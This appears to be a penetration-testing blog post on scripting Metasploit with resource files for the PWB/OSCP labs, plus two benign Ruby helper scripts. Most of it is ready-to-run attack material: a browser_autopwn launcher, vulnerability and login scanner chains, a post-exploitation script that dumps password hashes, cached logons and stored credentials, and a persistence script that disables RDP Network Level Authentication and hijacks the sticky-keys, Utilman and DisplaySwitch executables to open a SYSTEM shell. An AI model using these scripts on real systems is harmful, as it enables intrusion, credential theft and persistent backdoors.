Scripting Metasploit

Recently, in the PWB labs, I've had to do some very repetitive tasks with Metasploit. This involved checking for a lot of low-hanging fruit and, being a programmer, I had to automate. I quickly started chaining tests together in resource files and saved lots of time, which let me go after more systems simultaneously. The following are quick scripts I threw together; they are neither slick nor stealthy, but they show what you can do with resource files.

The first script quickly demos how resource files work by setting some better initial settings on everybody's favorite, browser_autopwn :D (Note that binding SRVPORT 80 means msfconsole has to run as root, or with the CAP_NET_BIND_SERVICE capability; pick a high port if that isn't an option.)

:~/$ vi browser_pwn.rc
#browser_autopwn resource
use auxiliary/server/browser_autopwn
set SRVPORT 80
set URIPATH /
run

msf > resource browser_pwn.rc

The following resource file initially requires the user to set RHOSTS globally using:

setg RHOSTS 192.168.1.1

Where 192.168.1.1 is the target. You can also point RHOSTS at a file of targets (file:/path/to/targets, one host per line) to scan a list. The next script then uses the global RHOSTS across multiple auxiliary modules, as above, without stopping for user input. It uses db_nmap to save the scans to the database, and a <ruby> block to read the global value back out of framework.datastore. Using the database in Metasploit really brings out a lot of its functionality. Again, the trick here is setting RHOSTS globally, which lets you chain commands quickly.
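Since a resource file is just lines of console commands, it can be generated instead of hand-edited. The following Ruby script is an added example, not code from the original post: it takes a target spec (a single address, a CIDR range, or file:<path> for a list) and a chain of modules with their options, and emits a resource file containing the setg RHOSTS line, a <ruby> block that reads the global back out of framework.datastore the way scanner.rc does, and the use/set/run chain. The module names are the ones used in this post; the THREADS value and the target file path are assumptions for illustration.

```ruby
# Added example (not from the original post): stamp out a resource file from a
# target spec and a module chain instead of editing the .rc by hand.
require 'ipaddr'

# Accepts a single IPv4/IPv6 address, a CIDR range, or "file:<path>" (a file
# with one target per line, which RHOSTS understands). Anything else raises
# IPAddr::InvalidAddressError so a typo never becomes a half-run scan.
def rhosts_value(target)
  return target if target.start_with?('file:')
  IPAddr.new(target)   # validation only; raises on garbage
  target
end

# Builds the rc text: setg RHOSTS, a <ruby> block that reads the global back
# out of framework.datastore (as scanner.rc does), then one use/set/run group
# per module. `modules` is [[module_path, {'OPT' => value, ...}], ...].
# The nmap port list defaults to the SMB/RPC ports scanned in the post.
def scanner_rc(target, modules, nmap_ports: 'U:135,T:139,445')
  rhosts = rhosts_value(target)
  lines = ['#generated low hanging fruit scanner', "setg RHOSTS #{rhosts}"]
  lines << '<ruby>'
  # \#{...} keeps the interpolation literal so msfconsole evaluates it, not us
  lines << "run_single(\"db_nmap -sU -sS -Pn -n -p #{nmap_ports} \#{framework.datastore['RHOSTS']}\")"
  lines << "run_single(\"services \#{framework.datastore['RHOSTS']}\")"
  lines << '</ruby>'
  modules.each do |mod, opts|
    lines << "use #{mod}"
    opts.each { |name, value| lines << "set #{name} #{value}" }
    lines << 'run'
  end
  lines.join("\n") + "\n"
end

# Example chain (module names from the post; the THREADS value is an assumption).
if __FILE__ == $0
  chain = [
    ['auxiliary/scanner/snmp/snmp_login',   { 'THREADS' => 10 }],
    ['auxiliary/scanner/vnc/vnc_none_auth', {}],
  ]
  puts scanner_rc('192.168.1.0/24', chain)
end
```

Redirect the output into a file (for example scanner_lab.rc) and load it with resource from the msf prompt; because the generator validates the target spec up front, a mistyped range fails in the generator rather than halfway through a scan.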

:~/$ vi scanner.rc

#low hanging fruit scanner
#launching a resource from inside a resource file (portscan.rc is not shown in this post)
 
resource portscan.rc

#calling ruby: the block must be opened and closed with exactly <ruby> and </ruby>
<ruby>
run_single("db_nmap -sU -sS -Pn -n --script=smb-check-vulns.nse,samba-vuln-cve-2012-1182 --script-args=unsafe=1 -p U:135,T:139,445 #{framework.datastore['RHOSTS']}")
run_single("db_nmap -sS -Pn -n --script=ftp-vuln-cve2010-4221.nse -p 21 #{framework.datastore['RHOSTS']}")
run_single("services #{framework.datastore['RHOSTS']}")
run_single("vulns #{framework.datastore['RHOSTS']}")
</ruby>

#chaining common scanners
use auxiliary/scanner/snmp/snmp_enum
run
use auxiliary/scanner/snmp/snmp_login
run
use auxiliary/scanner/snmp/snmp_enumusers
run
use auxiliary/scanner/snmp/snmp_enumshares
run
use auxiliary/scanner/nfs/nfsmount
run
use auxiliary/scanner/vnc/vnc_none_auth
run

msf > resource scanner.rc


The last script is just a quick one for looting information from a Windows machine once you've compromised it with meterpreter. It's no winenum by any stretch, but it grabs a set of information that was highly valuable to me in one quick, efficient stream, especially when combined with spool to write the output to a file. I just chain together my favorite Windows post modules and loot the victim for data. Again, the fun part here is that we can automate our post-exploitation; imagine the possibilities!

:~/$ vi post_windows.rc

run post/windows/gather/checkvm
getuid
sysinfo
getsystem
run post/windows/gather/hashdump
run post/windows/gather/credentials/credential_collector
run post/windows/gather/cachedump

run post/windows/gather/enum_logged_on_users
idletime

run post/windows/gather/enum_applications
run post/windows/gather/dumplinks

ipconfig

run post/windows/gather/enum_shares
run post/windows/gather/enum_snmp
run post/windows/gather/enum_ad_computers

run post/windows/gather/enum_devices
run post/windows/gather/usb_history

meterpreter > resource post_windows.rc
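A resource file fails silently at the first typo: the console just reports an unknown command and moves on to the next line, which is easy to miss in a long spool. The following Ruby script is an added example, not code from the original post: a small lint pass to run over an .rc before handing it to resource. It tracks <ruby> blocks, flags the mangled "< ruby >" spelling (which the console treats as a bogus command instead of opening a block), reports a console run or exploit with no module selected, and compares bare commands against an allowlist. The allowlists are an assumption limited to the commands this post uses, not the full msfconsole or meterpreter command set; extend them for your own scripts. The sample inputs in the usage are constructed.

```ruby
# Added example (not from the original post): lint a resource file before
# feeding it to `resource`. Allowlists below are an assumption covering only
# the commands used in this post; extend them for your own scripts.
METERPRETER_CMDS = %w[run getuid sysinfo getsystem idletime ipconfig load use resource].freeze
CONSOLE_CMDS     = %w[use set setg unset run exploit resource db_nmap services vulns].freeze

# Returns an array of "line N: message" strings; an empty array means clean.
# mode is :meterpreter for scripts run from a meterpreter prompt and :console
# for scripts run from the msf > prompt.
def lint_rc(text, mode:)
  known    = mode == :meterpreter ? METERPRETER_CMDS : CONSOLE_CMDS
  findings = []
  in_ruby  = false   # inside a <ruby> ... </ruby> block
  have_use = false   # a `use <module>` has been seen (console mode)

  text.each_line.with_index(1) do |raw, n|
    line = raw.strip
    next if line.empty? || line.start_with?('#')

    case line
    when '<ruby>'
      findings << "line #{n}: nested <ruby> block" if in_ruby
      in_ruby = true
      next
    when '</ruby>'
      findings << "line #{n}: </ruby> without matching <ruby>" unless in_ruby
      in_ruby = false
      next
    end
    next if in_ruby   # Ruby source, not console commands

    # "< ruby >" / "< / ruby >" never opens a block, so the Ruby lines that
    # follow get fed to the console as unknown commands instead of evaluated.
    if line =~ %r{\A<\s*/?\s*ruby\s*>\z}
      findings << "line #{n}: malformed ruby tag #{line.inspect}; use <ruby> and </ruby>"
      next
    end

    cmd = line.split(/\s+/, 2).first
    unless known.include?(cmd)
      findings << "line #{n}: unknown #{mode} command #{cmd.inspect}"
      next
    end
    if mode == :console
      have_use = true if cmd == 'use'
      if %w[run exploit].include?(cmd) && !have_use
        findings << "line #{n}: #{cmd} before any `use` (no module selected)"
      end
    end
  end

  findings << "line #{text.lines.size}: unterminated <ruby> block" if in_ruby
  findings
end

# Constructed sample: a post-exploitation script with a typo in getsystem.
if __FILE__ == $0
  sample = "run post/windows/gather/checkvm\ngetuid\ngetsytem\nrun post/windows/gather/hashdump\n"
  puts lint_rc(sample, mode: :meterpreter)
end
```

Run it as `ruby lint_rc.rb` to see the sample finding, or wrap the call in a one-liner over your rc directory before a lab session; the point is to catch the "getsytem" class of mistake before the script is halfway through a target.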


There ya' have it. Three quick and easy examples of Metasploit resource scripts! Now to stockpile the armory for the OSCP exam!

Update! I have some more RC scripts for you Lockboxx fans; check them out below. This one pushes registry changes through psexec_command (so it needs SMB admin credentials and RHOSTS set first) to set up RDP-based persistence: it switches off Network Level Authentication on the RDP listener, then registers cmd.exe as the IFEO "Debugger" for sethc.exe, Utilman.exe and DisplaySwitch.exe, so triggering sticky keys, Ease of Access or the display switcher at the logon screen pops a SYSTEM shell without logging in. It assumes RDP is already enabled and reachable on the target; it does not enable it.

:~/$ vi persist_windows.rc

#RDP / sticky keys persistence via psexec_command
#requires RHOSTS, SMBUser and SMBPass (plus SMBDomain if needed) set beforehand, e.g. with setg
use auxiliary/admin/smb/psexec_command
set command 'reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f'
run
set command 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f'
run
set command 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f'
run
set command 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f'
run

msf > resource persist_windows.rc